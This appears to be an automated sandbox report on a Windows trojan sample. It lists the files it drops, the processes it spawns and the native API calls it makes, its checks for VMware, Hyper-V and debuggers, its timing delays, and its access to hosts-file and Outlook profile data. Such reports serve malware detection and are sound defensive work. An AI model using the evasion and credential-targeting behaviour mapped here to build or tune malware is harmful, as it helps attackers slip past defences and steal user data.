          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_004038F3
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00422A4C
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00401BD0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00405653
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00420753
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB090
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61002
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AF900
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DEBB0
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B841F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A0D20
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A71D55
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C6E30
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: String function: 00401980 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041E833 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041E653 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041E703 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041E783 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EB040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E95F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E96D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EA710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009EA770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E9760 NtOpenProcess,
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeReversingLabs: Detection: 42%
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeVirustotal: Detection: 42%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeJump to behavior
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeFile created: C:\Users\user\AppData\Local\Temp\nsjF9DB.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@12/10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeUnpacked PE file: 3.2.vfpbkeeo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00410A64 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040A846 push cs; retf
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00411320 push ds; retf
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040DC2C pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040B4FA push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040AD0D push 255F11F9h; retf
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0041B674 pushad ; retf
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00401E20 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009FD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeFile created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\SysWOW64\cmd.exe TID: 5936Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D6A60 rdtscp
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 889
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 862
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A407DA GetSystemInfo,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004089B8 FindFirstFileExW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60201-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
          Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000003.449986076.000000000858E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c9
          Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000000.327263504.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.574282998.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SPS
          Source: explorer.exe, 00000004.00000002.576863468.000000000CDEA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000004.00000003.565329897.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.577506261.000000000D009000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
          Source: explorer.exe, 00000004.00000003.451089971.000000000CFB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.447484524.000000000CFB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_0040B06F GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D6A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A4005F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A4013E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A40109 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A4017B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h]
